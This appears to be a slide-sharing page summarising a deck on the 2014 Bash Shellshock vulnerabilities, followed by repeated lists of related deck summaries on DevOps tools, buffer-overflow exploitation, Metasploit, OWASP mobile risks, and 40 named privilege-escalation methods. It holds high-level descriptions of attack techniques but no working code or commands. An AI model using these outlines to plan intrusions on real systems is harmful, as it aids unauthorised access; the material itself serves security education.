The Shellshocker
•Download as PPTX, PDF•
1 like•1,247 views
This document summarizes the Shellshock bug in Bash software discovered in September 2014. It describes four vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-7169, and an unknown CVE) that could allow remote code execution by manipulating environment variables passed to Bash. The document also outlines potential attack scenarios like reverse shells, data theft, and click fraud that could exploit Shellshock. It concludes by mentioning Patch 27 and a script to fix the vulnerable Bash versions.
Report
Share
Report
Share
Recommended
TV Tubes - Talkin' 'bout my automation...
This document summarizes an automated process for downloading TV show episodes, converting the file format, adding the episodes to iTunes, and syncing to devices to watch shows without being tied to the TV schedule. The key components are:
1. TVShows.app downloads new episodes automatically via BitTorrent.
2. A folder action triggers VisualHub to reformat the files.
3. Another folder action uses Perl to parse episode data and add the formatted files to iTunes.
The overall process allows watching shows on demand by automatically handling the downloading, conversion, and syncing steps.
HOW TO DEAL WITH BLOCKING CODE WITHIN ASYNCIO EVENT LOOP
The document discusses various approaches for dealing with blocking code within the asyncio event loop:
1. Check if a compatible asyncio library exists
2. Check if a REST API is available to avoid blocking
3. Check if there is a simple text or binary protocol that can be implemented without blocking
4. Check if there is an existing synchronous Python client that can be adapted
5. Use a thread pool executor to run blocking code in separate threads to avoid blocking the event loop
For filesystem and CPU intensive operations, the document recommends using a thread pool executor due to OS limitations on asynchronous filesystem access. The aiofiles library provides an asynchronous filesystem wrapper that uses threads in the background.
The Symfony CLI
The Symfony2 full stack framework ships with a powerful command line interface that provides many useful tools to enhance your productivity as a developer. Tom Corrigan, Lead Developer at CRS Certus, provides an overview of selected commands.
The Unbearable Lightness: Extending the Bash shell
This document summarizes challenges and limitations of the Bash shell and discusses various attempts to address them through frameworks, libraries, and paradigms like object orientation, functional programming, and inversion of control. It highlights issues like variable scoping, lack of exceptions, sorting, parsing, binary data handling, and debugging as well as efforts like bashlets, bashinator, bash manager, and oobash to improve modularity, reuse, and robustness of Bash scripts.
BUILDING APPS WITH ASYNCIO
asyncio - is young library for asynchronous network programming. Lack of information on proper use and writing code in asyncio as well as production war stories slows down asyncio adoption.
In this talk I'll cover my experience with asyncio in production, best practices for writing reliable and testable asynchronous code as well as bunch of asyncio tips and tricks. We will discuss how run asyncio application in standalone mode, execute blocking code in event loop and moreover how embed asyncio in your synchronous application.
smash the stack , Menna Essa
This document provides an overview of how to perform a stack smashing attack, also known as a buffer overflow exploit, to execute arbitrary code on a vulnerable system. It outlines the key steps as finding a buffer overflow bug, verifying control of the instruction pointer, crafting shellcode to execute, and putting it all together. Specific techniques are mentioned like using patterns to find the instruction pointer location, Metasploit to generate Windows reverse shell shellcode, and inserting it along with a JMP ESP instruction into a long input to overwrite the stack and execute the shellcode. The document aims to explain the process at a high level for educational purposes.
Software Exploitation Techniques by Amit Malik
The document discusses stack-based buffer overflow vulnerabilities. It begins with an overview of buffer overflows and demonstrates one using the Filecopa FTP server. It explains the stack structure when functions call each other and how a buffer overflow can overwrite the return address on the stack. The document then discusses three methods for finding security bugs: fuzzing, reverse engineering, and source code auditing. It walks through fuzzing the FTP server, determining the vulnerable function through reverse engineering, calculating the offset needed for the instruction pointer, addressing issues of limited space on the stack, and constructing an exploit to gain remote code execution by manipulating the ECX register and jumping to it.
Microarmy - by J2 Labs
I describe a distributed load testing tool I built. It deploys some number of ec2 micros, configures them and then launches the load balancing tool in parallel against the website.
github.com/j2labs/microarmy
Recommended
TV Tubes - Talkin' 'bout my automation...
This document summarizes an automated process for downloading TV show episodes, converting the file format, adding the episodes to iTunes, and syncing to devices to watch shows without being tied to the TV schedule. The key components are:
1. TVShows.app downloads new episodes automatically via BitTorrent.
2. A folder action triggers VisualHub to reformat the files.
3. Another folder action uses Perl to parse episode data and add the formatted files to iTunes.
The overall process allows watching shows on demand by automatically handling the downloading, conversion, and syncing steps.
HOW TO DEAL WITH BLOCKING CODE WITHIN ASYNCIO EVENT LOOP
The document discusses various approaches for dealing with blocking code within the asyncio event loop:
1. Check if a compatible asyncio library exists
2. Check if a REST API is available to avoid blocking
3. Check if there is a simple text or binary protocol that can be implemented without blocking
4. Check if there is an existing synchronous Python client that can be adapted
5. Use a thread pool executor to run blocking code in separate threads to avoid blocking the event loop
For filesystem and CPU intensive operations, the document recommends using a thread pool executor due to OS limitations on asynchronous filesystem access. The aiofiles library provides an asynchronous filesystem wrapper that uses threads in the background.
The Symfony CLI
The Symfony2 full stack framework ships with a powerful command line interface that provides many useful tools to enhance your productivity as a developer. Tom Corrigan, Lead Developer at CRS Certus, provides an overview of selected commands.
The Unbearable Lightness: Extending the Bash shell
This document summarizes challenges and limitations of the Bash shell and discusses various attempts to address them through frameworks, libraries, and paradigms like object orientation, functional programming, and inversion of control. It highlights issues like variable scoping, lack of exceptions, sorting, parsing, binary data handling, and debugging as well as efforts like bashlets, bashinator, bash manager, and oobash to improve modularity, reuse, and robustness of Bash scripts.
BUILDING APPS WITH ASYNCIO
asyncio - is young library for asynchronous network programming. Lack of information on proper use and writing code in asyncio as well as production war stories slows down asyncio adoption.
In this talk I'll cover my experience with asyncio in production, best practices for writing reliable and testable asynchronous code as well as bunch of asyncio tips and tricks. We will discuss how run asyncio application in standalone mode, execute blocking code in event loop and moreover how embed asyncio in your synchronous application.
smash the stack , Menna Essa
This document provides an overview of how to perform a stack smashing attack, also known as a buffer overflow exploit, to execute arbitrary code on a vulnerable system. It outlines the key steps as finding a buffer overflow bug, verifying control of the instruction pointer, crafting shellcode to execute, and putting it all together. Specific techniques are mentioned like using patterns to find the instruction pointer location, Metasploit to generate Windows reverse shell shellcode, and inserting it along with a JMP ESP instruction into a long input to overwrite the stack and execute the shellcode. The document aims to explain the process at a high level for educational purposes.
Software Exploitation Techniques by Amit Malik
The document discusses stack-based buffer overflow vulnerabilities. It begins with an overview of buffer overflows and demonstrates one using the Filecopa FTP server. It explains the stack structure when functions call each other and how a buffer overflow can overwrite the return address on the stack. The document then discusses three methods for finding security bugs: fuzzing, reverse engineering, and source code auditing. It walks through fuzzing the FTP server, determining the vulnerable function through reverse engineering, calculating the offset needed for the instruction pointer, addressing issues of limited space on the stack, and constructing an exploit to gain remote code execution by manipulating the ECX register and jumping to it.
Microarmy - by J2 Labs
I describe a distributed load testing tool I built. It deploys some number of ec2 micros, configures them and then launches the load balancing tool in parallel against the website.
github.com/j2labs/microarmy
Ansible, Simplicity, and the Zen of Python
Slides from the following talk presented at PyCon Australia 2015:
https://www.youtube.com/watch?v=JlrkizEBjXk
Ansible is a configuration management tool, written in Python, that has taken the world of IT automation by storm. Its most remarkable quality is simplicity.
The Zen of Python is a set of aphorisms which capture the design philosophy of the Python language, one being "Simple is better than complex".
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
1. Ansible allows running automated tasks on remote servers using SSH, but running shell scripts introduces security risks if the Ansible controller is compromised.
2. Vagrant and Packer help create and distribute virtual machine images but early versions had security issues like hardcoding HTTP downloads and lack of signed checksums. Standards have improved but offline usage remains important.
3. Working offline can significantly speed up development workflows by avoiding network latency and issues, through techniques like freezing dependencies, caching packages locally, and disabling online repositories.
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
The document describes using Ansible to safely and easily update system packages across servers. It provides an example setup using CentOS Linux servers with yum, Slack for notifications, and an internal yum repository. The playbook checks for available updates, installs them using yum with notifications for reboots, and handles confirmation for critical servers.
C to perl binding
This document summarizes a talk given at YAPC Tokyo 2010 about calling C code from Perl using various techniques. It discusses Ctypes, a module for directly calling C functions without XS; Libperl++, a C++ library for embedding and extending Perl; and XS++, which allows writing C++ classes that integrate seamlessly with Perl using a special syntax.
Asynchronous Python at Kumparan
Going from 7,000 concurrent users to 50,000 concurrent users in a matter of seconds is not an uncommon occurrence at Kumparan. In this 5-10 minutes talk I will show you how Kumparan use Python asyncio to build a service to handle requests at this scale.
Transcript: https://medium.com/@pyk/asynchronous-python-at-kumparan-a511d478c2b9
Building and Testing Puppet with Docker
This document discusses using Docker containers to build and test Puppet code. It describes setting up a Docker container to mimic a production environment by specifying hostname, custom facts, and operating system. Tests can then be run by applying Puppet manifests within the container. The document also outlines using tools like rspec-puppet and beaker for additional testing and code reviews.
32 shell-programming
The document provides 22 shell programming examples covering tasks like checking if a number is even or odd, finding leap years, calculating area and circumference of a circle, checking if a number is a palindrome, finding sum of odd and even numbers in a set, calculating roots of a quadratic equation, checking if a number is Armstrong or prime, generating prime numbers between 1-50, finding sum of squares or cubes of digits of a number, executing UNIX commands using case statements, counting vowels in text, displaying student grades, finding smallest or second highest number, finding single digit sum of a number, and finding sum of odd and even digits from a number.
Low Level Exploits
This document discusses various low-level exploits, beginning with creating shellcode by extracting opcodes from a compiled C program. It then covers stack-based buffer overflows, including return-to-stack exploits and return-to-libc. Next it discusses heap overflows using the unlink technique, integer overflows, and format string vulnerabilities. The document provides code examples and explanations of the techniques.
Flask With Server-Sent Event
This document discusses server-sent events (SSE) and provides examples of using SSE with Flask and Python. SSE allows for single-connection server push capabilities in HTML5. It then demonstrates how to build a simple SSE example using Flask, Redis, and an asynchronous WSGI server like Gunicorn. The example shows how updated text can be pushed from the server in real-time to the browser without reloading the page. Finally, potential other uses of SSE like dynamic website updates and real-time games are mentioned.
Elixir Into Production
The goal of this talk is to provide new and existing Elixir programmers with knowledge on how to get their application into production and, once it's there, how to tune it for scale.
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
This Elixir deployment overview will recommend two different approaches to getting your application deployed.
You will learn about both containerized deploys and OTP deploys and the hope is to provide enough information that you can decide which is right for your situations.
The talk will also cover some common situations that must be considered when it comes to the Elixir build and deploy workflow.
ElixirConf Lightning Talk: Elixir |> Production
The document discusses various tools and techniques for deploying Elixir applications to production including exrm for building releases, fpm for packaging, publishing packages to an internal apt repository, and using Puppet to install packages, configure files, and ensure services are running. It thanks several contributors for their work on conform, exrm, fpm, and the internal apt repository.
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Mike Weber's training class on monitoring Linux mail servers with Nagios. The training session was held during the Nagios World Conference North America held Sept 27-29th, 2011 in Saint Paul, MN. For more information on the conference (including photos and videos), visit: http://go.nagios.com/nwcna
Fabric for fun_and_profit
Fabric is a Python tool for streamlining the use of SSH for systems administration tasks. It allows you to write Python functions to represent tasks and run them on remote servers. The document provides an introduction to Fabric and examples of using it to execute commands on multiple servers, define environments for development and production, and integrate with tools like Vagrant. Fabric allows mixing Python and system calls to perform automated administrative tasks across multiple servers.
DevOps with Fabric
This document provides examples of using Fabric, a Python library for streamlining the use of SSH for application deployment or systems/network administration tasks. Some key points:
- Fabric allows defining tasks that can be run remotely on SSH-accessible servers via simple Python functions decorated with @task.
- It supports running tasks selectively on hosts or roles. Dynamic host lists can be used by querying external data stores.
- Tasks can be composed together and executed sequentially or in parallel.
- Fabric integrates with tools like Django, handles SSH authentication, and provides utilities like file transfers, command line output formatting, and more.
- The examples demonstrate common patterns for application deployment, database migrations, static file management
Docker導入手順
This document provides instructions to update existing Docker packages, remove any existing Docker packages, install the latest versions of Docker and Docker Compose, and verify their installation on an Ubuntu system. The instructions update apt package lists, remove any existing Docker packages, install prerequisite packages, add the Docker GPG key, configure the Docker repository, install Docker CE, verify the Docker version, download Docker Compose to /usr/local/bin, and verify the Docker Compose version.
Symfony Under the Hood
Andreas Hucks
SensioLabs Deutschland
CTO
Symfony has a wide user base today. Most who work with Symfony on a daily basis have configured their own services, are fluent in configuring routing and validators. But what is actually going on under the hood? What happens when the configuration is parsed? What is a cache warmup? What happens to a request before hitting your controller? How does the HttpKernel work? Andreas will help us gain insight into the inner workings of the Symfony framework. If you have used
Symfony, but have never built a compiler pass, a cache warmer, or are wondering how exactly the container is built, this talk is for you.
Welcome to Swift (CocoaCoder 6/12/14)
The document provides an overview of the key features of the Swift programming language, including its support for standard types like Int and String, optional types, generics, closures, functions, classes and objects, and interoperability with Objective-C. It notes that Swift is a new language from Apple that compiles like a scripting language but is intended to eventually replace Objective-C, and it showcases various language constructs through code examples.
Ansible - Swiss Army Knife Orchestration
Ansible is a configuration management and orchestration tool that is agentless, uses SSH for connections, and is designed to be easy to use. It allows users to define infrastructure by writing playbooks that describe configurations, deployments, and orchestrations. Playbooks can install software, copy files, execute commands, and more on remote servers. Ansible playbooks provide an idempotent and predictable way to configure and manage infrastructure and applications.
Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande. Présentation de l'outil dtrace et du langage D. — Frank Lefebvre
Metasploit Humla for Beginner
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
Secuirty News Bytes-Bangalore may 2014
Major news in the month included unrest in Turkey and a coup in Thailand. Ebay was hacked and fake user databases were sold. The USA charged five Chinese nationals with cyber espionage. Memory issues caused failures in an air traffic control system. Interesting tools released included ones for bypassing two-factor authentication and exploiting ad networks. Heartbleed continued to be analyzed and disclosed vulnerabilities in certificate authorities.
More Related Content
What's hot
Ansible, Simplicity, and the Zen of Python
Slides from the following talk presented at PyCon Australia 2015:
https://www.youtube.com/watch?v=JlrkizEBjXk
Ansible is a configuration management tool, written in Python, that has taken the world of IT automation by storm. Its most remarkable quality is simplicity.
The Zen of Python is a set of aphorisms which capture the design philosophy of the Python language, one being "Simple is better than complex".
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
1. Ansible allows running automated tasks on remote servers using SSH, but running shell scripts introduces security risks if the Ansible controller is compromised.
2. Vagrant and Packer help create and distribute virtual machine images but early versions had security issues like hardcoding HTTP downloads and lack of signed checksums. Standards have improved but offline usage remains important.
3. Working offline can significantly speed up development workflows by avoiding network latency and issues, through techniques like freezing dependencies, caching packages locally, and disabling online repositories.
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
The document describes using Ansible to safely and easily update system packages across servers. It provides an example setup using CentOS Linux servers with yum, Slack for notifications, and an internal yum repository. The playbook checks for available updates, installs them using yum with notifications for reboots, and handles confirmation for critical servers.
C to perl binding
This document summarizes a talk given at YAPC Tokyo 2010 about calling C code from Perl using various techniques. It discusses Ctypes, a module for directly calling C functions without XS; Libperl++, a C++ library for embedding and extending Perl; and XS++, which allows writing C++ classes that integrate seamlessly with Perl using a special syntax.
Asynchronous Python at Kumparan
Going from 7,000 concurrent users to 50,000 concurrent users in a matter of seconds is not an uncommon occurrence at Kumparan. In this 5-10 minutes talk I will show you how Kumparan use Python asyncio to build a service to handle requests at this scale.
Transcript: https://medium.com/@pyk/asynchronous-python-at-kumparan-a511d478c2b9
Building and Testing Puppet with Docker
This document discusses using Docker containers to build and test Puppet code. It describes setting up a Docker container to mimic a production environment by specifying hostname, custom facts, and operating system. Tests can then be run by applying Puppet manifests within the container. The document also outlines using tools like rspec-puppet and beaker for additional testing and code reviews.
32 shell-programming
The document provides 22 shell programming examples covering tasks like checking if a number is even or odd, finding leap years, calculating area and circumference of a circle, checking if a number is a palindrome, finding sum of odd and even numbers in a set, calculating roots of a quadratic equation, checking if a number is Armstrong or prime, generating prime numbers between 1-50, finding sum of squares or cubes of digits of a number, executing UNIX commands using case statements, counting vowels in text, displaying student grades, finding smallest or second highest number, finding single digit sum of a number, and finding sum of odd and even digits from a number.
Low Level Exploits
This document discusses various low-level exploits, beginning with creating shellcode by extracting opcodes from a compiled C program. It then covers stack-based buffer overflows, including return-to-stack exploits and return-to-libc. Next it discusses heap overflows using the unlink technique, integer overflows, and format string vulnerabilities. The document provides code examples and explanations of the techniques.
Flask With Server-Sent Event
This document discusses server-sent events (SSE) and provides examples of using SSE with Flask and Python. SSE allows for single-connection server push capabilities in HTML5. It then demonstrates how to build a simple SSE example using Flask, Redis, and an asynchronous WSGI server like Gunicorn. The example shows how updated text can be pushed from the server in real-time to the browser without reloading the page. Finally, potential other uses of SSE like dynamic website updates and real-time games are mentioned.
Elixir Into Production
The goal of this talk is to provide new and existing Elixir programmers with knowledge on how to get their application into production and, once it's there, how to tune it for scale.
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
This Elixir deployment overview will recommend two different approaches to getting your application deployed.
You will learn about both containerized deploys and OTP deploys and the hope is to provide enough information that you can decide which is right for your situations.
The talk will also cover some common situations that must be considered when it comes to the Elixir build and deploy workflow.
ElixirConf Lightning Talk: Elixir |> Production
The document discusses various tools and techniques for deploying Elixir applications to production including exrm for building releases, fpm for packaging, publishing packages to an internal apt repository, and using Puppet to install packages, configure files, and ensure services are running. It thanks several contributors for their work on conform, exrm, fpm, and the internal apt repository.
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Mike Weber's training class on monitoring Linux mail servers with Nagios. The training session was held during the Nagios World Conference North America held Sept 27-29th, 2011 in Saint Paul, MN. For more information on the conference (including photos and videos), visit: http://go.nagios.com/nwcna
Fabric for fun_and_profit
Fabric is a Python tool for streamlining the use of SSH for systems administration tasks. It allows you to write Python functions to represent tasks and run them on remote servers. The document provides an introduction to Fabric and examples of using it to execute commands on multiple servers, define environments for development and production, and integrate with tools like Vagrant. Fabric allows mixing Python and system calls to perform automated administrative tasks across multiple servers.
DevOps with Fabric
This document provides examples of using Fabric, a Python library for streamlining the use of SSH for application deployment or systems/network administration tasks. Some key points:
- Fabric allows defining tasks that can be run remotely on SSH-accessible servers via simple Python functions decorated with @task.
- It supports running tasks selectively on hosts or roles. Dynamic host lists can be used by querying external data stores.
- Tasks can be composed together and executed sequentially or in parallel.
- Fabric integrates with tools like Django, handles SSH authentication, and provides utilities like file transfers, command line output formatting, and more.
- The examples demonstrate common patterns for application deployment, database migrations, static file management
Docker導入手順
This document provides instructions to update existing Docker packages, remove any existing Docker packages, install the latest versions of Docker and Docker Compose, and verify their installation on an Ubuntu system. The instructions update apt package lists, remove any existing Docker packages, install prerequisite packages, add the Docker GPG key, configure the Docker repository, install Docker CE, verify the Docker version, download Docker Compose to /usr/local/bin, and verify the Docker Compose version.
Symfony Under the Hood
Andreas Hucks
SensioLabs Deutschland
CTO
Symfony has a wide user base today. Most who work with Symfony on a daily basis have configured their own services, are fluent in configuring routing and validators. But what is actually going on under the hood? What happens when the configuration is parsed? What is a cache warmup? What happens to a request before hitting your controller? How does the HttpKernel work? Andreas will help us gain insight into the inner workings of the Symfony framework. If you have used
Symfony, but have never built a compiler pass, a cache warmer, or are wondering how exactly the container is built, this talk is for you.
Welcome to Swift (CocoaCoder 6/12/14)
The document provides an overview of the key features of the Swift programming language, including its support for standard types like Int and String, optional types, generics, closures, functions, classes and objects, and interoperability with Objective-C. It notes that Swift is a new language from Apple that compiles like a scripting language but is intended to eventually replace Objective-C, and it showcases various language constructs through code examples.
Ansible - Swiss Army Knife Orchestration
Ansible is a configuration management and orchestration tool that is agentless, uses SSH for connections, and is designed to be easy to use. It allows users to define infrastructure by writing playbooks that describe configurations, deployments, and orchestrations. Playbooks can install software, copy files, execute commands, and more on remote servers. Ansible playbooks provide an idempotent and predictable way to configure and manage infrastructure and applications.
Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande. Présentation de l'outil dtrace et du langage D. — Frank Lefebvre
What's hot (20)
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Viewers also liked
Metasploit Humla for Beginner
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
Secuirty News Bytes-Bangalore may 2014
Major news in the month included unrest in Turkey and a coup in Thailand. Ebay was hacked and fake user databases were sold. The USA charged five Chinese nationals with cyber espionage. Memory issues caused failures in an air traffic control system. Interesting tools released included ones for bypassing two-factor authentication and exploiting ad networks. Heartbleed continued to be analyzed and disclosed vulnerabilities in certificate authorities.
Demystifying captcha Bangalore Meet April 18
CAPTCHA is a type of challenge-response test used to determine if a user is human. It was created in 2000 to prevent bots from spamming websites. There are different types of CAPTCHAs including distorted words, picture identification, puzzle solving, 3D images, and reCAPTCHAs which help digitize books while determining if a user is human. The document discusses the history and applications of CAPTCHAs, providing examples of how they are used to prevent comment spam, protect website registrations, and block dictionary attacks from non-human users.
Flashack
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
Browser Exploit Framework
BeEF (Browser Exploitation Framework) is a penetration testing tool that focuses on exploiting vulnerabilities within a web browser. It works by hooking one or more browsers and using them as entry points to launch attacks against the system from within the browser context. This allows penetration testers to assess the actual security of a target environment by exploiting client-side attack vectors beyond the hardened network perimeter.
Metasploit Demo
This document provides an overview and demonstration of the Metasploit penetration testing framework. It discusses key Metasploit concepts like vulnerabilities, exploits, payloads and modules. The demonstration shows using msfconsole to access exploits like ms10_046_shortcut_icon_dllloader and payloads like meterpreter. It also shows post-exploitation commands like getting system privileges and dumping hashes. The document is intended to introduce the reader to Metasploit's capabilities and provide a hands-on demo of its usage.
IE Memory Protector
This talk presents a brief overview of Use-after-Free vulnerability and corresponding exploitation techniques for Internet Explorer (IE), followed by description of memory protection schemes implemented in newer versions of IE in order to mitigate exploitation of such vulnerabilities.
ESAPI
This document discusses the OWASP ESAPI project, a security API that aims to simplify application security for developers. It provides an overview of ESAPI, including that it contains over 120 security methods and interfaces and was first released in 2010. The document also notes that developers should customize ESAPI to match their own organization and that canonicalization and encoding features are mature, while data validation could be improved.
Owasp Mobile Top 10 – 2014
The document discusses the OWASP Mobile Top 10 security risks for 2014. It begins by introducing the OWASP Mobile Security Project and its goal of maintaining a list of the most critical risks for mobile applications. The document then lists the top 10 risks for both 2012 and 2014, providing more details on each of the 2014 risks, including weak server-side controls, insecure data storage, insufficient transport layer protection, unintended data leakage, poor authorization and authentication, broken cryptography, client-side injection, security decisions via untrusted inputs, improper session handling, and lack of binary protections. It also recommends some vulnerable mobile apps that can be used for hands-on practice.
Recon ng null meet April 2015
The document summarizes an OSINT meetup discussing open-source intelligence (OSINT) and the Recon-ng tool. The meetup agenda included an introduction to OSINT and Recon-ng, a demonstration of the tool's modules and capabilities through test cases, and a special thanks to the creators of Recon-ng. The document promoted freely collecting intelligence from public sources and using tools like Recon-ng to conduct passive reconnaissance and vulnerability hunting.
Owasp m7-m8-shivang nullmeetblr 21june2015
Shivang Desai presented on OWASP Mobile Top 10 risks M7 (Client Side Injection) and M8 (Security Decisions via Untrusted Inputs). He defined the risks, showed examples like SQL injection, XSS, and URL scheme hijacking. The impacts include consuming paid resources, data exfiltration, and privilege escalation. Prevention methods include sanitizing untrusted data, prepared statements, input validation, and checking caller permissions.
Venom vulnerability Overview and a basic demo
This vulnerability, called VENOM, allows an attacker to escape from a virtual machine guest into the host system. It affects virtualization platforms that use Xen, Qemu, KVM, or VirtualBox as their hypervisor. The vulnerability is in the virtual floppy disk controller code, which contains a buffer overflow issue. This allows an attacker to potentially gain code execution on the host machine. It is a serious issue because many cloud providers use these vulnerable virtualization platforms.
Rapid Android Application Security Testing
This topic will cover key concepts in android application security testing by employing a variety of tools and techniques to fasten the testing process.
This was presented at Null Bangalore Chapter (Saturday April 26 2014, 11:00 AM)
Security Monitoring using SIEM null bangalore meet april 2015
This document discusses security information and event management (SIEM) systems. It defines log files and events, and explains that SIEM systems allow organizations to monitor security events and write correlation rules to detect patterns of attacks. The document outlines typical SIEM architectures and notes that SIEM systems present detailed information about attack scenarios by correlating disparate security-related events from various sources.
OWASP Bangalore : OWTF demo : 13 Dec 2014
This slide deck used as part of the OWASP OWTF demo session during combined monthly meet for OWASP, null, Garage4Hackers
Tale of Forgotten Disclosure and Lesson learned
Visual version of http://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto The presentation talks about how a disclsoure was forgotten and what we can do to prevent such issues and how to keep a track on Vulnerable components
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
This presentation talks about OWASP Mobile Risk M2 i.e. Insecure Data Storage. The agenda of the presentation is to understand the Data Storage and effect of insecure data storage. Then it also had demo's of known insecure data storage flaws. Methods to identify this flaw and various precautions that a developer should take to prevent this flaw.
The presentation was done as part of null/OWASP/G4H Monthly Meet
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
This presentation is part of a series focused on OWASP Mobile Top 10 : We discussed about what is data leakage, places where data could be leaked. sample /examples of data leakage and how it differes from M2: Insecure data storage.
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
This Session will focus on Mobile Top 10 2014-M3 : Insufficient Transport Layer protection. We will try to understand Transport Layer, Transport layer security (TLS), insecurities in TLS/SSL, and how this affects the overall security of Mobile Devices as well as what kind of protection can be applied and how this can be identified..
Viewers also liked (19)
Security Monitoring using SIEM null bangalore meet april 2015
Security Monitoring using SIEM null bangalore meet april 2015
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Similar to The Shellshocker
ShellShock (Software BASH Bug)
Shellshock is a security bug in Bash (Bourne Again SHell) command-line interpreter, mostly known as shell. Linux expert Stéphane Chazelas revealed this bug on 24th September 2014, and it is more severe than Heartbleed bug.
Article on shellshock
It is bug related to UNIX bash system. Doc which explain completely about the shell shock bug and it includes the step by step code segments related to shell shock bug
Shellshock bug
Shellshock is a vulnerability in Bash that allows attackers to execute arbitrary commands on vulnerable systems. It was discovered in September 2014 and affected many Linux and Unix-based systems. The bug allows environment variables passed to Bash to execute code, potentially allowing remote code execution. This could enable large-scale DDoS attacks and access to sensitive systems.
Shell Shock (Bash Bug)
It is security bug related to the UNIX Bash Shell. Here I've provided all the info regarding the shell shock vulnerability.
Shellshock - A Software Bug
Shellshock is a 25-year-old vulnerability in the widely used Bash shell. It allows remote execution of commands via specially crafted environment variables. The bug has a severity score of 10 out of 10 due to its low complexity to exploit, lack of authentication needed, and ability to give full control of vulnerable systems. It affects many systems running Linux, embedded devices, and Internet of Things devices. While patches were quickly released, many older and forgotten systems will remain unpatched and vulnerable indefinitely.
Shellshock
This document discusses exploiting the Shellshock Bash vulnerability (CVE-2014-6271) through a CGI script. It explains that while Bash is not usually exposed directly through a web application, it can be indirectly exposed through a Common Gateway Interface (CGI) script. The vulnerability allows defining Bash functions through environment variables passed to the CGI script from the web server, enabling arbitrary commands to be executed if not sanitized properly. Fingerprinting the application can help identify any CGI scripts that are vulnerable.
The bash vulnerability practical tips to secure your environment
A recently discovered hole in the security of the Bourne-Again Shell (bash) has the majority of Unix/Linux (including OS X) admins sweating bullets. You should be, too - attackers are actively exploiting the vulnerability on un-patched web servers, network services and daemons that use shell scripts with environment variables (this can include network equipment, industrial devices, etc.). So, what can you do to protect your environment?
Join us for a live demo covering:
*Insights from Jaime Blasco, Director of AlienVault Labs on how attackers are exploiting this vulnerability
*Practical tips to minimize your exposure to attack
*How AlienVault USM can detect the bash vulnerability, and alert you of active attacks
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of Privilege escalation methods with complete Descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersontePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting Kerberoasting
Methods for Privilege Escalation Part One.pdf
